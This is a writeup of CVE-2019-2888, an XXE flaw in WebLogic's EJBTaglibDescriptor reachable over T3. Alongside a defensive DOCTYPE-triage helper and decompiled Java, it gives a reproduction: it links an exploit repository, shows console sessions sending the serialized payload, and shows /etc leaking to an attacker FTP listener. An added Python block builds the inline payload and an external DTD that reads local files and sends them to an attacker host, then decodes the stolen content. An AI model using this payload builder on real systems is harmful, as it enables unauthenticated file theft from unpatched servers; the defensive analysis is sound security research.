# CVE-2019-2888: WebLogic EJBTaglibDescriptor XXE vulnerability

## 1. Vulnerability overview

`weblogic.servlet.ejb2jsp.dd.EJBTaglibDescriptor` implements `Externalizable`, and the XML it carries is parsed when the object is deserialized. The `DocumentBuilder` used for that parse does not reject a `DOCTYPE`, so an unauthenticated client that can reach the T3 port can send a descriptor whose DTD declares external entities and have the server resolve them: read local files or directory listings and push the result to an attacker-controlled HTTP or FTP listener (out-of-band XXE). Oracle fixed the issue in the October 2019 Critical Patch Update; the parser-side fix for this class of bug is to refuse any `DOCTYPE` (and external entity resolution) on input that never legitimately carries one.

## 2. Affected versions

The EJB Container component of WebLogic Server 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0 is affected.
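The descriptor handed to the vulnerable parser never legitimately contains a `DOCTYPE`, so the sound fix on the parser side is to reject one outright rather than to look for `file:` URLs. The following is an added example in that spirit and is not code from this writeup or from WebLogic: a triage helper that flags any `DOCTYPE`, lists the external entities it declares, and shows why a second-stage DTD can hide the actual file read from a first-hop check. The sample documents are constructed; the listener address 10.10.20.166 and the `%aaa;%ccc;%ddd;` entity names are taken from the session shown later on this page.

```python
import re
from urllib.parse import urlsplit

# <!ENTITY [%] name SYSTEM "uri">  or  <!ENTITY [%] name PUBLIC "pubid" "uri">
ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(?P<pe>%\s+)?(?P<name>[^\s>]+)\s+"""
    r"""(?:SYSTEM\s+|PUBLIC\s+(?:"[^"]*"|'[^']*')\s+)"""
    r"""(?P<uri>"[^"]*"|'[^']*')""",
    re.IGNORECASE,
)
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)

# schemes that make the parser talk to a remote host
OOB_SCHEMES = ("http", "https", "ftp")


def external_entities(text):
    """Return [(name, is_parameter_entity, uri)] for each SYSTEM/PUBLIC entity.

    '&#37;' is turned back into '%' first: a DTD spells a parameter-entity
    declaration that way when the declaration is meant to appear only after
    another entity is expanded, which is the two-stage trick used for
    out-of-band exfiltration.
    """
    text = text.replace("&#37;", "%").replace("&#x25;", "%")
    return [
        (m.group("name"), m.group("pe") is not None, m.group("uri")[1:-1])
        for m in ENTITY_RE.finditer(text)
    ]


def _split(uri):
    try:
        return urlsplit(uri)
    except ValueError:  # e.g. a malformed IPv6 literal: treat as opaque
        return None


def analyse(text, is_external_subset=False):
    """Triage one XML document (or, with is_external_subset=True, a DTD).

    The verdict is 'reject' as soon as a DOCTYPE is present; the remaining
    fields record what the parser would have done.  Only the first hop is
    visible in the document itself: the file read can sit in the external
    DTD that the first hop fetches, which is why matching on 'file:' alone
    is not a fix.
    """
    has_doctype = DOCTYPE_RE.search(text) is not None
    ents = external_entities(text) if (has_doctype or is_external_subset) else []
    parsed = [(uri, _split(uri)) for _, _, uri in ents]
    oob_hosts = sorted({p.hostname for _, p in parsed
                        if p is not None and p.scheme in OOB_SCHEMES and p.hostname})
    local_reads = [uri for uri, p in parsed if p is not None and p.scheme == "file"]
    return {
        "doctype": has_doctype,
        "external_entities": ents,
        "oob_hosts": oob_hosts,
        "local_reads": local_reads,
        "verdict": "reject" if (has_doctype or ents) else "accept",
    }


# Constructed samples: a benign descriptor-shaped document, an inline payload
# shaped like the one in the writeup, and the external DTD it would fetch
# (listener address 10.10.20.166 is taken from the writeup's session).
BENIGN = '<?xml version="1.0"?><ejb-taglib><beans/></ejb-taglib>'
PAYLOAD = (
    '<?xml version="1.0"?><!DOCTYPE x [<!ENTITY % aaa SYSTEM '
    '"http://10.10.20.166:8989/ext.dtd">%aaa;%ccc;%ddd;]><x/>'
)
EXT_DTD = (
    '<!ENTITY % bbb SYSTEM "file:///etc">\n'
    "<!ENTITY % ccc \"<!ENTITY &#37; ddd SYSTEM "
    "'ftp://fakeuser:%bbb;@10.10.20.166:2121/x'>\">\n"
)

if __name__ == "__main__":
    for label, doc, dtd in (("benign", BENIGN, False),
                            ("payload", PAYLOAD, False),
                            ("ext.dtd", EXT_DTD, True)):
        print(label, analyse(doc, is_external_subset=dtd))
```

Run against the inline payload the helper sees only the HTTP fetch of `ext.dtd`; the `file:///etc` read and the FTP callback show up only when the external subset itself is analysed, which is the reason a `DOCTYPE` on this input should be rejected unconditionally.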

## 3. Reproduction

### fernflower.jar

The target class is `weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class` (in this session `weblogic.jar` has been unpacked into a directory of the same name):

```shell
╭─root@jas502n /var
╰─# find ./ | grep EJBTaglibDescriptor
.//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorTree.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorPanel.class
╭─root@jas502n /var
╰─# ls
EJBTaglibDescriptor.java fernflower.jar weblogic.jar
```

#### EJBTaglibDescriptor.class to EJBTaglibDescriptor.java

```shell
╭─root@jas502n /var
╰─# java -jar fernflower.jar .//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class ./
./
INFO: Decompiling class weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor
INFO: … done
╭─root@jas502n /var
╰─# ls
EJBTaglibDescriptor.java fernflower.jar weblogic.jar
```

#### cat EJBTaglibDescriptor.java

```shell
╭─root@jas502n /var
╰─# cat EJBTaglibDescriptor.java
```

```java
package weblogic.servlet.ejb2jsp.dd;

import java.io.Externalizable;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.ObjectInput;
import java.io.ObjectOutput;
import java.io.Reader;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Enumeration;
import java.util.Iterator;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import org.w3c.dom.Element;
import org.xml.sax.InputSource;
import weblogic.servlet.ejb2jsp.BeanGenerator;
import weblogic.servlet.ejb2jsp.EJBMethodGenerator;
import weblogic.servlet.ejb2jsp.EJBTaglibGenerator;
import weblogic.servlet.ejb2jsp.HomeCollectionGenerator;
import weblogic.servlet.ejb2jsp.HomeFinderGenerator;
import weblogic.servlet.ejb2jsp.HomeMethodGenerator;
import weblogic.servlet.internal.dd.ToXML;
import weblogic.utils.Getopt2;
import weblogic.utils.classloaders.ClasspathClassLoader;
import weblogic.utils.io.XMLWriter;
import weblogic.xml.dom.DOMProcessingException;
import weblogic.xml.dom.DOMUtils;
import weblogic.xml.jaxp.WebLogicDocumentBuilderFactory;

// Externalizable: readExternal() runs on deserialization, which is where the
// attacker-supplied XML is parsed.
public class EJBTaglibDescriptor implements ToXML, Externalizable {
    private static final long serialVersionUID = -9016538269900747655L;
    private FilesystemInfoDescriptor fileInfo;
    private BeanDescriptor[] beans;
    private transient ClassLoader jarLoader;
    private static final String PREAMBLE = "\n";

    static void p(String var0) {
        System.err.println("[EJBTagDesc]: " + var0);
    }

    // ... remainder of the decompiled class not shown
}
```

### Exploitation

**Download the Python xxer**

https://github.com/ianxtianxt/CVE-2019-2888

Start xxer on the attacker host. It serves `ext.dtd` over HTTP (here http://10.10.20.100:8989/ext.dtd) and runs an FTP listener on port 2121 that receives the exfiltrated data; `-H` must be an address the target can reach:

```shell
python xxer.py -p 8989 -H 10.10.20.100

 _ _ _ _ ___ ___
|_'_|_'_| -_| _|
|_,_|_,_|___|_|

version 1.1

info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):

%aaa;%ccc;%ddd;]>
```

**Send the serialized XML payload over the T3 protocol**

`weblogic.py` opens a T3 connection to the target, completes the `t3 12.2.1` / `HELO` handshake and then sends the serialized `EJBTaglibDescriptor` whose XML points at the xxer listener (10.10.20.166:8989 in this run):

```shell
ale@Pentest:~/Desktop/CVE-2019-2888# python weblogic.py 10.10.20.100 7001

 _ __ __ __ _ _ ___ __ ______
| | / /__ / /_ / /___ ____ _(_)____ | |/ / |/ // ____/
| | /| / / _ \/ __ \/ / __ \/ __ `/ / ___/ | /| // __/
| |/ |/ / __/ /_/ / / /_/ / /_/ / / /__ / |/ |/ /___
|__/|__/\___/_.___/_/\____/\__, /_/\___/ /_/|_/_/|_/_____/
/____/

CVE-2019-2888 WebLogic EJBTaglibDescriptor XXE vulnerability

python By jas502n

[+] XXE_IP= 10.10.20.166
[+] XXE_IP= 8989
[+] http://10.10.20.166:8989/ext.dtd

connecting to 10.10.20.100 port 7001
sending "t3 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7001

"
received "HELO"
sending payload...

ale@Pentest:~/Desktop/CVE-2019-2888#
```

**Listing the `/etc` directory**

Back on the attacker host, the xxer log shows the target fetching `ext.dtd` and then logging in to the FTP listener. The listing of `/etc` arrives as the FTP password: the first entry follows `PASS`, and every newline in the content starts a new control-channel line:

```shell
root@kali:~/xxer# python xxer.py -p 8989 -H 10.10.20.166

 _ _ _ _ ___ ___
|_'_|_'_| -_| _|
|_,_|_,_|___|_|

version 1.1

info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):

%aaa;%ccc;%ddd;]>

10.10.20.100 - - [01/Nov/2019 12:58:42] "GET /ext.dtd HTTP/1.1" 200 -
info: FTP: recvd 'USER fakeuser'
info: FTP: recvd 'PASS .pwd.lock
adduser.conf
alternatives
apparmor
apparmor.d
apt
bash_completion.d
bash.bashrc
bindresvport.blacklist
blkid.conf
blkid.tab
ca-certificates
ca-certificates.conf
console-setup
cron.d
cron.daily
cron.hourly
cron.monthly
cron.weekly
crontab
dbus-1
debconf.conf
debian_version
```
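The three steps above (serve `ext.dtd`, deliver the inline payload, read the listing off the FTP control channel) form one chain. The following is an added example, not code from this writeup and not the code of xxer or `weblogic.py`: it builds the two halves of that chain with the entity names the page shows (`%aaa;%ccc;%ddd;`) and decodes an FTP control-channel log of the shape above back into the exfiltrated content. The listener address 10.10.20.166, ports 8989/2121, the `fakeuser` login, the `%bbb` helper entity and the sample log are assumptions chosen to match the session; T3 delivery of the serialized descriptor is not reproduced here.

```python
# Assumptions taken from the writeup's second run.
LISTENER_HOST = "10.10.20.166"   # attacker box
HTTP_PORT = 8989                 # serves ext.dtd
FTP_PORT = 2121                  # receives the exfiltrated content


def build_inline_payload(host=LISTENER_HOST, http_port=HTTP_PORT):
    """The XML handed to the vulnerable parser.

    Only %aaa; is declared inline: XML forbids a parameter-entity reference
    inside an entity value in the internal subset, so the file read and the
    URL that carries it must be declared in the external DTD that %aaa;
    pulls in.  %ccc; then declares %ddd;, and %ddd; fires the FTP request.
    """
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<!DOCTYPE x [<!ENTITY % aaa SYSTEM "http://{host}:{http_port}/ext.dtd">'
        '%aaa;%ccc;%ddd;]><x/>'
    )


def build_ext_dtd(target="/etc", host=LISTENER_HOST, ftp_port=FTP_PORT):
    """The ext.dtd served by the HTTP listener.

    %bbb reads the target (a file: URL for a directory yields its listing,
    which is what the writeup's /etc output is).  %ccc's replacement text is
    itself an entity declaration; &#37; is an escaped '%', so %ddd is only
    declared when %ccc; is expanded in the document, by which point %bbb; has
    been substituted into the URL.  The content travels in the FTP password,
    sent by the target's FTP client as 'PASS <content>'.
    """
    return (
        f'<!ENTITY % bbb SYSTEM "file://{target}">\n'
        '<!ENTITY % ccc "<!ENTITY &#37; ddd SYSTEM '
        f"'ftp://fakeuser:%bbb;@{host}:{ftp_port}/x'>\">\n"
    )


# Commands the FTP client sends once the login exchange is over; the first of
# these after the password ends the data (assumption: no exfiltrated line
# happens to start with one of them).
FTP_COMMANDS_AFTER_LOGIN = ("TYPE ", "CWD ", "RETR ", "PASV", "EPSV",
                            "PORT ", "EPRT ", "QUIT")


def decode_ftp_channel(control_lines):
    """Reassemble the exfiltrated content from the listener's control-channel log.

    Everything from the text after 'PASS ' up to the first post-login FTP
    command is file content, one line per newline in the original.
    Returns the recovered lines ([] if no PASS was seen).
    """
    recovered, in_password = [], False
    for raw in control_lines:
        line = raw.rstrip("\r\n")
        if not in_password:
            if line.upper().startswith("PASS "):
                recovered.append(line[5:])
                in_password = True
            continue
        if line.upper().startswith(FTP_COMMANDS_AFTER_LOGIN):
            break
        recovered.append(line)
    return recovered


# Constructed control-channel capture in the shape of the writeup's log.
SAMPLE_FTP_LOG = [
    "USER fakeuser",
    "PASS .pwd.lock",
    "adduser.conf",
    "apparmor.d",
    "crontab",
    "TYPE I",
    "CWD x",
]

if __name__ == "__main__":
    print(build_inline_payload())
    print(build_ext_dtd())
    print("\n".join(decode_ftp_channel(SAMPLE_FTP_LOG)))
```

xxer writes the equivalent of `build_ext_dtd()` to disk and serves it from its own HTTP listener while its FTP listener logs the `USER`/`PASS` lines; `decode_ftp_channel()` is the step the page does by eye, reading the listing straight off the `PASS` line and those that follow it.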
